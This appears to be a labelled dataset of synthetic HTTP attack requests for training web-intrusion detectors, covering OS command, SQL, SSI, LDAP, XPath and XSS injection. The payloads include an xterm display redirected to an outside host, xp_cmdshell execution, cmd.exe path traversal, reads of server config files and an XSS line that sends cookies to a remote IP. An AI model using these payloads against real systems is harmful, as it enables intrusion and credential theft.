Cache-Control: no-cache
Client-ip: 71.223.100.67
Cookie: F3=?H\6nZ r2\ 
Cookie2: $Version="76"
Date: Tue, 21 Mar 06 19:44:48 GMT
ETag: W/"ZuWdza31fuAokGFJWS"
Expect: tbosO4uw=ourpoii
From: hyzyx@lhmoxRAr.net
If-Modified-Since: Mon, 20 Dec 04 22:30:59 UTC
If-Unmodified-Since: Wed, 02 Dec 09 22:36:44 GMT
If-Match: *
If-None-Match: *
If-Range: "d8zBZtD9r-Kt1cAB4fN"
Max-Forwards: 0721
MIME-Version: 0.7
Pragma: no-cache
Proxy-Authorization: NTLM WnIwdnBERGM3cmJuZXJsbmk1RWVlZWd0MGllRW9hc21l
Authorization: lEte cnsibeh=ossr0o
Range: 255628-2199,-5155,68350-473
Referer: /lh4f9dg1/aznid.jsp
TE: trailers,trailers,chunked;q=0.7
Trailer: If-Unmodified-Since
User-Agent: tpZVS6I http://www.suwha.org
UA-CPU: MIPS
UA-Disp: 016,6175,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 7231x6416
Via: HTTP/7.5 53.255.9.133, 2.7 195.61.187.212
Transfer-Encoding: identity
Upgrade: 1yiN/0.8, rtga/9.0
Warning: 052 www.Unilgch.jpeg "ie5oeuioieegkTE3" "Sat, 11 Jun 05 12:14:11 UTC"
X-Forwarded-For: 230.76.2.187
X-Serial-Number: 9140776636485
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47042
Start - Id: 43103
class: OsCommanding
GET /dDPw/SQs.tZ/4HoaKOLGDZCPs/wp-RU/bIPDhPSd/atiPTtesev/IBmwEshitl.bin?tVKGP=S%27i8cwitrRXiinsert&ubKTe=%250A+++xterm++++-display++++www.siasdeasan.com%3A0.0&noolb83=reez3eH&vTlocationYRxSCzcat=tthteliy2&LIMHBX1pz=z%3A+Yx HTTP/1.0
Host: 180.128.233.219
Connection: close
Accept: */*
Accept-Charset: euc-kr
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 160.22.241.142
Cookie: oey3efl9rrsN=201
Cookie2: $Version="389"
Date: Wed, 23 Mar 05 19:39:10 GMT
ETag: "_4qjG6.03WCUTMpx"
Expect: 100-continue
From: roneeua@1gSEvrlu.org
If-Modified-Since: Sat, 21 Mar 09 04:23:17 UTC
If-Unmodified-Since: Sun, 11 Jun 06 23:28:11 CET
If-Match: "UjNe9a5DLNArNIpI34"
If-None-Match: *
If-Range: "HL4rjtEB9D0isHuw"
Max-Forwards: 0737
MIME-Version: 6.4
Pragma: no-cache
Proxy-Authorization: Jwosfs mnR2=s6nera
Authorization: Basic ZWx3dG86cHVsc3U=
Referer: /hoeh/eloi2.msf
TE: deflate
Trailer: If-Modified-Since
User-Agent: nfJ7GamXhL http://www.dhsf.cz
UA-CPU: 68000
UA-Disp: 046,4473,8
UA-OS: Solaris
UA-Pixels: 2923x7442
Via: HTTP/3.1 70.64.208.142, e4e/7.5 www.t5se.tiff, FTP/8.5 6.84.45.88
Transfer-Encoding: identity
Upgrade: gowla/8.8, 8aooI/3.3, Tkiyol/1.8
Warning: 117 www.nI2s.jpeg "duaiiS2" 
X-Forwarded-For: 204.73.145.24
X-Serial-Number: 306986025864028
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43103
Start - Id: 35363
class: SqlInjection
GET /esMpc/9ZWvimglogLconnectV0openb6Ev/ohhip/feK/bhviUysms/ohdvt6hRmne2eioi/wV4-@gyNuMUxUTWC.mspx?5wtIr=strahd8Poe&fEloagmcNn=mpkol&boot.iniyGN_qZ8fBi=pLIqUmj-&rty=mmdY+&Smun0nthiiiuA=1ci1pllsobeaqb&66stieiIo=5rr+ledzDmxmlrcmmmocha&mOrg3=Aletyihrinni8ami&wl7diceeciOjir=5&my=r458wyl2b5JT&hnDso=jLaR+eQn8th%27&gtyfWXBSW=6f7P1uA8KN0&bf=%27+++++or++id+++++in+++++%28+select++++*+++++from+++user_db+++%29 HTTP/1.1
Host: 72.73.145.19
Connection: keep-alive
Accept: audio/*, video/mpeg
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 117.97.243.63
Cookie: nr9ntyuUtioeeli=17195;aletgnimEa=IeE2Aarh;wie=suevalHmselhadminag/txtqg
Cookie2: $Version="02"
Date: Sun, 06 Feb 05 08:58:11 UTC
ETag: "J1@QwciNnR492wCw"
Expect: iyae=5nrIpr2o;dtnjiyvt=obreirso
From: ualuoer@tmohteyrt.be
If-Modified-Since: Sat, 16 Jan 10 23:13:23 UTC
If-Unmodified-Since: Thu, 13 Jan 05 20:58:48 CET
If-Match: *
If-None-Match: "EFK3G9kLLBgB-Kr"
If-Range: Fri, 12 Jun 09 07:01:46 CET
Max-Forwards: 456
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: Basic dGE1cjphaXR0bWFsdA==
Authorization: tatos 8nlSpeje=8eoUwrs
Range: 56564-256483,76-,27160-85
Referer: /xaoeoa1/mthnswit/tytEb.gif
TE: trailers
Trailer: Host
User-Agent: ame1oe (iYUw_zb; eeXqrPxOM; lGpjch; wAZgRie2; oVuGNR)
UA-CPU: 68000
UA-Disp: 937,2809,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 0771x4490
Via: 1.2 211.136.235.52:70051, 3.1 198.233.154.18
Transfer-Encoding: compress
Upgrade: gerh/9.6
Warning: 139 211.110.179.8 "89naeuaax" "Fri, 10 Aug 07 03:05:37 CET"
X-Forwarded-For: 129.227.252.231
X-Serial-Number: 06713
----: ----------
~~~~~: ~~~~~~~~~~~

null

End - Id: 35363
Start - Id: 39687
class: SSI
GET /79NDnMm8luF/ng8tRyeaWod/zrc6mrdhtlsrt7aixuo/dI4RUDAZ/juJErn4mail/cldvxTeuneaoeghr/evS-O2gTcX/ms1/ta4EeHaiteHhtdRlohi.mspx?iterBaigxa=%3C%21--+++++%23include++virtual%3D%22%2Fetc%2Fhttpd%2Fhttpd.conf%22+++++--%3E HTTP/1.0
Host: 58.1.98.32
Connection: asocenai
Accept: image/*;q=0.7, text/*, video/*;q=0.5
Accept-Charset: *;q=0.9
Accept-Encoding: compress;q=0.0, compress;q=0.0, identity, gzip;q=0.0, gzip
Accept-Language: bi-ie, ontErra-uho;q=0.8, oA4enrx-6
Cache-Control: only-if-cached
Client-ip: 210.184.120.254
Cookie: yrnoeepZfnuh1u=gBGSVW.ci;lmtmHaashNj=nEo%;9Owf5wT_cJ=rtoet'eOfwZeefUl;Nalavaeadsegtie=35019323;rmtciih=f6Svr;gpenfnytf=\7t6f
Cookie2: $Version="672"
Date: Sat, 29 Sep 07 14:16:53 UTC
ETag: "MnC6RG5yCfdECDak"
Expect: 100-continue
From: ekb7rls@onnByehnb.gov
If-Modified-Since: Mon, 01 Nov 04 11:32:20 CET
If-Unmodified-Since: Wed, 14 Jul 04 02:34:49 CET
If-Match: *
If-None-Match: "S6b9OQxbHrRTnn4dERhx"
If-Range: *
Max-Forwards: 6
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: NTLM eWFzbG90QXl0YXM0YXR1ejdzMGZzdGFkaGNpZWtJYWZyQm5OdXM3bEJ1eXVp
Range: 11490-87515,-392,063833-721563
Referer: /luaAa3on/f2iy/nna2i.jpg
TE: gzip;q=0.8
Trailer: User-Agent
User-Agent: rd3tWoteAEe
UA-CPU: Sparc
UA-Disp: 0266,938,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 726x074
Via: 9.2 www.mtqofent.png, 4.5 122.157.14.160
Transfer-Encoding: deflate
Upgrade: im0/0.0, gln/3.7
Warning: 245 www.etcYe.gif "ra5teOtlcka8shsedl7" 
X-Forwarded-For: 166.133.168.205
X-Serial-Number: 9911764547155
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39687
Start - Id: 43171
class: OsCommanding
GET /ipH6.Obk20Wd3TMeV/xj2e/Xi3cmdGr1ArOQUKb/emzNmAnIL..sh?libBx95DD-=iPust9&ntiox1=bp0ei%5Cmu6l&o2eesspiarhog8=rhpaolcA4&ey=u%27TkoprzhEn%3By7+e&CvIo=nO&omaohtkietl=lh%3C7s+tto%3D%40&hteoit3e=4ncgwhwDEh%25d+0f%2BR&V.Wnode=9&ica=3&04tsynjlnoib=AKi&ihaaiin71zhux=musre&ruz6j=%7C+++echo+++++%22+++++Content-Type%3A+text%2Fhtml%22+%3B+echo++++%22%22++++%3B++++id++++%5C0 HTTP/1.1
Host: 232.226.152.92:80
Connection: teics
Accept: image/jpeg, image/*
Accept-Charset: *;q=0.0
Accept-Encoding: deflate, gzip;q=0.4, identity, identity
Accept-Language: bhr2dz1-afowet;q=0.1, slqS-megcsef;q=0.6, fddnnmrm-7st4eg8;q=0.6, g4hione-e;q=0.2
Cache-Control: yht2i=z
Client-ip: 174.7.46.175
Cookie: avcthwztsEmtNe=mlga3k<s hc[ rCvbscript\olink;xDjaccess_log39-g=S7vtrd;lxIdrou98biah8g=391;jeh=nCOnnc6bdhntwa;awe=885561;ans=sla7mcqps2mn
Cookie2: $Version="045"
Date: Thu, 08 Sep 05 01:04:14 GMT
ETag: "3n7cYjzbN.STqhi"
Expect: 100-continue
From: spog@iutmqee.net
If-Modified-Since: Tue, 04 Aug 09 07:15:59 UTC
If-Unmodified-Since: Fri, 17 Jun 05 19:30:21 CET
If-Match: "NigX6kCx54DvB0@"
If-None-Match: "9G-r3zudstkL2b4S"
If-Range: Sat, 29 May 04 05:23:38 GMT
Max-Forwards: 921
MIME-Version: 2.9
Pragma: sSIuriea=sdNhel
Proxy-Authorization: Basic OWFyMXVlZDo2cnBobg==
Authorization: Digest nc=Bef4e5bA
Range: 332370-1588,656-95
Referer: /vtijt/olqt/riue83s/hlLf.jsp
TE: trailers,chunked,trailers
Trailer: If-Match
User-Agent: 6e@TYnbUU http://www.ejEl2os.org
UA-CPU: Sparc
UA-Disp: 6178,9185,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 953x846
Via: 7.1 www.ssttlemo.jpeg
Transfer-Encoding: qrcQeh
Upgrade: ehu/7.5, lem/4.9, eney/6.2, rTm/6.8, lfh/2.5
Warning: 027 www.snsA.shtml "dncghr1daAmsfa" 
X-Forwarded-For: 179.224.81.249
X-Serial-Number: 97812200258960530552
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43171
Start - Id: 44141
class: OsCommanding
GET /images/.%2e/.%2e/.%2e/.%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 22.48.252.129:80
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: identity, deflate, deflate, deflate, identity
Accept-Language: *
Cache-Control: no-transform
Client-ip: 31.223.174.93
Cookie: yaJouAiyuekie=addaa;lIOnsr=11155185;iolplrbsyfnnhe=29785256
Cookie2: $Version="03"
Date: Mon, 11 Aug 08 24:38:44 UTC
ETag: W/"W7fa4Q-.MjhJ7B8G"
Expect: Fzazt0Oa
From: qrumvR@uodIyinab6.uk
If-Modified-Since: Fri, 29 Jan 10 02:08:33 CET
If-Unmodified-Since: Sun, 21 Jun 09 04:15:17 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 71
MIME-Version: 4.2
Pragma: 6mAtm9f=4njseaeI
Proxy-Authorization: Basic ZHJueHU6c3J0M2FIbGU=
Authorization: ogSor oauhe=c6eam
Range: 815-,644-20793
Referer: http://ergetoR.gov/ate5/yihin.swf
TE: trailers
Trailer: Upgrade
User-Agent: Mozilla/9.7 (Windows; U; Win 9x 6.4; sl-fb; rv:3.7.2) Gecko/69844897
UA-CPU: PowerPC
UA-Disp: 010,645,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 1501x189
Via: 4.5 59.90.147.15
Transfer-Encoding: identity
Upgrade: elepej/6.1, assl/9.6, tHws/5.5
Warning: 107 www.si6e.html "aijehiis7sesns5zav5" "Sun, 10 Oct 04 08:09:53 CET"
X-Forwarded-For: 175.18.32.237
X-Serial-Number: 008751
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44141
Start - Id: 39678
class: SSI
GET /loa/74cc/dt/bs.cUlyu/vanabEo/ekfD.y18OtyQSjOXE/rOT.lPIN0@X3GGED5ird/7MW_Y/skYU0raX@36Z/seorcheaaoJlnoApoiis.gif?ay8d=%3C%21--+++%23include++virtual%3D%22%2Fvar%2Flog%2Fhttpd%2Faccess.log%22+--%3E&iYunionoDh=3fiasuEYrs&oeuyjeo=z3e2r&.yxgvZRszM=9169&ahn4=eite HTTP/1.1
Host: www.7shi9mev.cz
Connection: rceee
Accept: */*
Accept-Charset: iso-8859-5, iso-8859-8, big5
Accept-Encoding: compress
Accept-Language: dtogfrnq-Rr;q=0.1
Cache-Control: only-if-cached
Client-ip: 17.56.25.243
Cookie: tmjh72snemnfta=inwwlttuttre;5dmRtHtjhnar=Amma;vtrn7cRodop5ecr=aw-Vl.kN0zkC;tcafm=tstA e;oeueTpsE=esoo ohrc4betweenrmlrAvbscriptesba
Cookie2: $Version="57"
Date: Sun, 17 Feb 08 10:58:39 CET
ETag: "MnC6RG5yCfdECDak"
Expect: treOe=e9zoc
From: odEootep@ltmngy.biz
If-Modified-Since: Tue, 06 Apr 10 13:15:58 CET
If-Unmodified-Since: Fri, 10 Aug 07 19:14:21 CET
If-Match: *
If-None-Match: *
If-Range: "xK1saFgGulzrQ2lzG4D4"
Max-Forwards: 4392
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Digest nc=bfF4DAEf
Range: 047-,52-2392,30343-939979
Referer: http://www.fBdoysgE.gov/Olen.nsf
TE: trailers,trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/9.2 (compatible; MSIE 2.2; Mac OS X; 7naejOt0t)
UA-CPU: 68000
UA-Disp: 0266,938,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 726x074
Via: HTTP/6.5 www.eehma.html:0137, enr/2.5 www.ojn7cmy.htm
Transfer-Encoding: gzip
Upgrade: id8d/1.6, amqh/8.3, de3ts/9.5, se7lsr/8.4
Warning: 733 214.19.169.247 "I5ohianit" 
X-Forwarded-For: 166.133.168.205
X-Serial-Number: 9911764547155
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 39678
Start - Id: 39069
class: LdapInjection
PUT /cIDbcd-70O0/slceaJwx/eri3Dw/u8JYvWCUEsvNP7lPr0.gif? HTTP/1.1
Content-Length: 33
Content-Language: m7,uesjmgi
Content-Encoding: identity
Content-Location: http://uctznngq.gov/mtio/E76il/acTjSaea/wn0d.php
Content-MD5: YmxoaGVlVGJlT3ZUc25rcw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 28 Feb 05 12:55:14 CET
Last-Modified: Wed, 06 Aug 08 05:22:06 UTC
Host: www.z3phe.gov
Connection: idNfi1ae
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 137.169.113.69
Cookie: 49e=ifc;qhedHgehn=rwcshhnam;nNdt4eEsmometne=onc7)(&(objectClass   = qose*);V4Mn=rBMb5
Cookie2: $Version="6"
Date: Wed, 13 Apr 05 14:49:12 CET
ETag: ".0u_z.AlvPuA9LK6LDW"
Expect: aliiyo1
From: ct0nt@neotdaE7.cz
If-Modified-Since: Fri, 30 Sep 05 07:25:45 CET
If-Unmodified-Since: Tue, 02 Mar 04 12:37:09 UTC
If-Match: "4_tkTExPXH4pAU3CHDa"
If-None-Match: *
If-Range: *
Max-Forwards: 1465
MIME-Version: 8.7
Pragma: Zt5oasc=aez
Proxy-Authorization: Basic N3NpdHc6aXZoaXRv
Authorization: Digest cnonce="hteahe"
Range: 4-036093,-25292
Referer: http://nseichwn.de/n3nwSE/tpcretp/sa0esu.php3
TE: deflate;q=0.1,deflate,trailers
Trailer: User-Agent
User-Agent: Mozilla/3.8 (Machintosh; U; PPC 8.9; fs-Ol; rv:3.2.2) Gecko/21085511
UA-CPU: MIPS
UA-Disp: 5522,0953,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 427x4997
Via: FTP/2.6 147.31.12.192
Transfer-Encoding: gzip
Upgrade: oe8sa5/3.6, asot/7.7, vIoul/0.4, Oitiff/6.5
Warning: 543 www.edobgt0.js "lcowdr5ilNc" "Thu, 29 Dec 05 20:06:59 GMT"
X-Forwarded-For: 35.165.196.147
X-Serial-Number: 53018392304378
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

icsn75t=06885787&wM22efpg6=674349

End - Id: 39069
Start - Id: 46886
class: XSS
PUT /odlulnlopitepy/erdr2naiae4w1ss5/a0iZ0B.8z4MP/sock_streamMoYF0/nuemaLoetUnt5yrr/m4tNrP@Z74/d1mf43lPbw/OWprocessing-instructionuMJ/oljtbbgitepieuiRtv/MWhawcmengnikeay/rtnnsaaGneuhsuhRrz/hbh4i0delHinft.tiff? HTTP/1.0
Content-Length: 338
Content-Language: nruoiuqa
Content-Encoding: gzip
Content-Location: http://www.isnp.uk/ijahus.js
Content-MD5: cGxNZjlwcXRuV2VlaXM4bg==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 02 Jul 07 10:26:36 CET
Last-Modified: Wed, 19 Dec 07 02:23:28 UTC
Host: 44.211.230.8
Connection: close
Accept: */*
Accept-Charset: windows-1250;q=0.0, x-mac-greek;q=0.1, x-mac-ce;q=0.8, utf-8, iso-2022-kr;q=0.6
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.1
Cache-Control: only-if-cached
Client-ip: 164.249.24.153
Cookie: jossbrmAiOit=dh4b@JCm;eisernzav=py60clhb
Cookie2: $Version="4"
Date: Sat, 09 Sep 06 15:17:57 CET
ETag: W/"P63_8lnCuOkf3hTuY"
Expect: 100-continue
From: nbfea3@yM2KA0.biz
If-Modified-Since: Mon, 10 Jan 05 10:31:09 UTC
If-Unmodified-Since: Sun, 08 Jan 06 14:07:57 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 02 Mar 08 03:38:09 UTC
Max-Forwards: 6
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: Basic Y2VsZ2luZTpmYW5vOUUz
Authorization: f77db aetmsn=Lobo5twv
Range: -87,-41
Referer: /dac7t/mtetep/s8AkS/dqac/wtms.jsp
TE: trailers,trailers,deflate
Trailer: Transfer-Encoding
User-Agent: Mozilla/9.7 (X11; U; Linux i386 6.6; ea-9d; rv:4.5.7) Gecko/59141051
UA-CPU: Sparc
UA-Disp: 457,6373,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 2245x173
Via: 0.2 www.ehmg5rs.css
Transfer-Encoding: gzip
Upgrade: nteIn/8.4, ihne/7.6, mbtti/6.3, lts/2.7
Warning: 749 124.119.94.150:741 "rcapb76l7ke" "Tue, 13 Dec 05 01:19:14 GMT"
X-Forwarded-For: 59.28.178.137
X-Serial-Number: 93268691782079750245
----: ----------------
~~~~~: ~~~~~~~~~~~

tfneemosn=<img   src   =  "  livescript:[window.open('http://206.195.247.170/tadeol.cfm'+document.cookie);]         "  >&Zkboot.iniOf=:nxanhint:Eidm?p&flhIst6hotecrB=g&trp9dy=h5&ifgrn6iaee=848816562&.hXkonGpm=y|s&ydemhfrll0c0eo=ookf0trerte&p7=T=T0lte&leos=dJ3LPA30By&m9m9czbep=3nt&7nnetm=teoe

End - Id: 46886
Start - Id: 47223
class: XSS
GET /o.ZSbNVj4aYCH4LjLG/aewvepfhcoi5NA/fLnapte7haope/dYxaX8g1yCCZh5qk_/ixl6IsosD/igWtvgnp/ouBh9Z8beDPU1/nBa2D/7SqprqerTNimsydyT2n/i36R-3/airnntabQe/SifjDkoTre.msf?s0otsratonb=nT7&haoerwncosaI=tni%28&MRepWtRff=bsvxN3t.Tic&uHlbgsound0=sz1&PwinntQV@=+hDheiframestyle%3Dohzq&6i4seOetctc=%3Cdiv+++style%3D+%22+++++binding%3A+++url%28%5Bhttp%3A%2F%2Fwww.elor.com%2Fscript%2Ftmt4r.cgi%5D%29%3B+++++%22++++%3E&dar26ssfotfSear=adcJrrenmnZfmeori&oSyePC=ho3ntaztnea4aston&phlerrclw54Hsi=epttte4 HTTP/1.0
Host: 231.235.221.142
Connection: feutaph
Accept: video/*
Accept-Charset: *
Accept-Encoding: identity;q=0.0, identity;q=0.2
Accept-Language: h-n9syaolj
Cache-Control: max-age=01166
Client-ip: 179.225.149.173
Cookie: fliirtqasnayhsa=iwgett;priod=74029900
Cookie2: $Version="537"
Date: Fri, 27 Jul 07 20:01:07 GMT
ETag: "1GrtRjyzVjvgoMOl2e"
Expect: 100-continue
From: nsseehjh@a5ejeaendE.biz
If-Modified-Since: Sun, 11 Mar 07 12:02:40 GMT
If-Unmodified-Since: Wed, 27 Apr 05 07:36:30 UTC
If-Match: *
If-None-Match: *
If-Range: "ej1u75kNnOtKjbGRB1C"
Max-Forwards: 665
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: Basic bW5kZ2VrbmU6dWVja2FoaXA=
Authorization: Digest username="pwrd"
Range: 7379-
Referer: http://www.iustI1.be/hetacla.fgf
TE: gzip;q=0.1,trailers,gzip;q=0.4
Trailer: TE
User-Agent: Mozilla/1.6 (Machintosh; U; PPC Mac OS X 4.1; aa-yr; rv:1.4.0) Gecko/71632776
UA-CPU: 68000
UA-Disp: 4828,524,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 286x017
Via: FTP/5.8 243.168.202.251, 1.0 www.6vs9Z8if.jpeg:949
Transfer-Encoding: gzip
Upgrade: rako/1.9, sgo/1.5, 5edi/5.4, t0a/2.0
Warning: 809 www.usatae.gif "ooabotEle" 
X-Forwarded-For: 102.233.207.222
X-Serial-Number: 04739435468972088
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47223
Start - Id: 42023
class: SqlInjection
GET /xntnie8o/oecfDLs0ntbeeT.jsp?ctab3=AND+ascii%28lower%28substring%28%28SELECT++TOP+1+++++ee8dne0++++FROM+++++sysobject+++++WHERE++xtype++%3D+%27U%27++++%29%2C1%2C1%29%29%29++++%3E+++++111 HTTP/1.1
Host: www.t7dne.net:80
Connection: close
Accept: text/*;q=0.2
Accept-Charset: utf-7, windows-1250, koi8
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: min-fresh=97
Client-ip: 144.52.64.113
Cookie: WGObprocessing-instructionIS.Rl=qfnzmc;1ihOssneeac=ov3@;n4oslt=ireaitidi;KhtaccesxyCJ=$oH 
Cookie2: $Version="334"
Date: Fri, 04 Feb 05 03:33:59 CET
ETag: "xrVUfSsUKUujhJHXyI"
Expect: ouiSlPr
From: eliqs@octere.st
If-Modified-Since: Wed, 08 Mar 06 19:03:20 UTC
If-Unmodified-Since: Sat, 31 Dec 05 10:00:25 CET
If-Match: *
If-None-Match: "ET5za89pIK5.DkzGsT6V"
If-Range: "gghkTF6AUe5h4pJ"
Max-Forwards: 0
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: iaijaB rjera=cnidom
Authorization: Digest opaque="4venij"
Range: 4936-0,-6636
Referer: /3ep1iRor.jpg
TE: trailers,gzip;q=0.0
Trailer: Date
User-Agent: Mozilla/8.2 (Windows; U; Win98 8.1; Iz-d3; rv:6.9.7) Gecko/81683774
UA-CPU: 68000
UA-Disp: 7502,392,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 0057x268
Via: HTTP/1.6 211.99.188.186:4962, 9.0 89.96.129.153:48917, FTP/3.8 www.u3lie.shtml
Transfer-Encoding: compress
Upgrade: tomgi/1.4, rQn9a/6.1, etcrc/1.8
Warning: 583 www.veos.jpg "tedi" 
X-Forwarded-For: 58.152.231.239
X-Serial-Number: 063116688396663
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 42023
Start - Id: 41043
class: SqlInjection
GET /t0_/8l9/su9FnfRk9y-dC/Vand0H_access_logRM/prstkoePlehautnx/CXQinPSCC/twaO6VWAzzb3V/euseojwhstt8reatgo/rh5od.jpeg?qeuemNPTfe=rb&aeedxIaethw=%3Dt4where&wogdss3ttabjder=eysvwherehttpw6nq%24ho&4UK9=33&MeRd=%27%3BEXEC+++++master.dbo.xp_cmdshell+++%27cmd.exe&eefaii9dv=uuq+d&idfsp5j=ae9fRE%3B%7C&wOaccept7le@z7@=et3wfl+K%5C%3Ce%24inputn%26w HTTP/1.1
Host: 193.180.118.123:80
Connection: keep-alive
Accept: application/postscript, text/xml;q=0.7, image/*
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: t82n-am2;q=0.2
Cache-Control: no-transform
Client-ip: 228.241.241.37
Cookie: cron=/a wlIactrobai;tqsnnr=sKXKISCYdWvv;agnrg=s0;kwyeuqfoge=reMT_le;ihHpe=e
Cookie2: $Version="1"
Date: Tue, 08 Aug 06 18:21:47 GMT
ETag: W/"_WrR1Ly1ZlOqxyWv2v9n"
Expect: issottp
From: i4axWsi@dEthgse.cz
If-Modified-Since: Sun, 21 Dec 08 20:35:04 UTC
If-Unmodified-Since: Mon, 09 Feb 09 24:19:41 CET
If-Match: "8wX7mC.vklwA5ck59"
If-None-Match: "RpkovYZmfpWLjLn"
If-Range: "zRu2NRpV9XxMIV6l6ykf"
Max-Forwards: 8
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: dEwdh oSgoauto=ctAcmei
Authorization: Basic OGZidGM1cXo6bFRzcUE0dA==
Range: 7-04,570-
Referer: http://www.lha8.uk/ly4e/ooasihom/fonDeist.asmx
TE: trailers,trailers
User-Agent: Mozilla/2.5 (Machintosh; U; Mac OS X 9.6; la-eA; rv:7.0.9) Gecko/53091456
UA-CPU: PowerPC
UA-Disp: 3796,7783,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 381x817
Via: laoeoe/4.4 84.117.104.4
Transfer-Encoding: deflate
Upgrade: mme/2.4, 09a/7.3, yAr/5.1, ihhdl/6.4
Warning: 050 www.r6ioleOa.htm "witutEd" 
X-Forwarded-For: 57.95.233.202
X-Serial-Number: 54708069609443708
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 41043
Start - Id: 38102
class: LdapInjection
GET /o6ZAIR4YqB.YGBaiZSA/ho/nethtoiv/dx/ntsalqLatcmwb7xfooVw/diAhadeitieetstxri9l/g2KduI0n3@X1JX/p_rGoc6@cQ7kBNf-/huitLuhi/eOyD3aEZ829OkBbal9RY/nnvtn/rRiP.dll?rce8eiye=8628&qt8e=6tO%2Fr&Dsus=3&liteaio2nn=ti&c0x5tRzx=f6mb.mFKC&iedshdlrH0On=%29+%28+++%7C%28tuooa%3DNEsx*%29 HTTP/1.0
Host: www.yceihta.gov
Connection: lcu89wts
Accept: image/png, image/gif, application/rtf
Accept-Charset: euc-cn, hz-gb-2312, windows-1257, x-mac-greek
Accept-Encoding: 
Accept-Language: hzeaiq-ene9W;q=0.5
Cache-Control: only-if-cached
Client-ip: 80.51.6.160
Cookie: FNWlykX%ue=621;it4boyScaq=e%40E;cseerasaetrdyah=r+aeammochaxp_+L
Cookie2: $Version="20"
Date: Tue, 09 Feb 10 16:02:47 UTC
ETag: "Zj4yOJLgWxL5jkoqj"
Expect: yzytf=wi36hMoe
From: ehldyeiL@ertsuha.st
If-Modified-Since: Thu, 27 Sep 07 06:45:11 GMT
If-Unmodified-Since: Fri, 26 Aug 05 13:34:26 CET
If-Match: *
If-None-Match: *
If-Range: "YP8E1XEmq3KZJtx"
Max-Forwards: 15
MIME-Version: 1.3
Pragma: lI2w=homy5tEh
Proxy-Authorization: Ounls db5m=ee3eth
Authorization: Basic b3NpZTo4b2xlM2E=
Range: -26705,8389-9530,6-32
Referer: http://ecosawf.biz/e13atihm/uche/wdtcc/gmemii.msf
TE: chunked,deflate;q=0.7,trailers
Trailer: Trailer
User-Agent: iNEABc0 http://www.areeusa.cz
UA-CPU: 68000
UA-Disp: 299,6993,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 3700x2595
Via: 6.8 177.60.252.111, 4.2 www.arrzt.css:8512, 5.0 241.22.114.3:419
Transfer-Encoding: deflate
Upgrade: s8aa/8.6, yeyo7a/9.5
Warning: 144 20.10.204.100 "scbn8telndd3" "Sun, 20 Feb 05 17:46:24 UTC"
X-Forwarded-For: 164.220.220.166
X-Serial-Number: 2885123328233620
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38102
Start - Id: 49808
class: XPathInjection
GET /9C/sftrr/J2_5l.1.htm?yhaynsAdeHiLuo=10525&eeNsdas7it0=246&ey2jn4n=r%40QO9%40h&rnddo=65148++or+++1%3C++zeEw%2Fmeato%2Fbe%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D20%5D+or+++1417%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27&dnnSXA6W8=oCJ&tkthRe=6&fo5s8tr=me%5DvdoxuOetcpw%28%3E HTTP/1.1
Host: 19.70.34.62
Connection: oddnehte
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: only-if-cached
Client-ip: 248.234.57.173
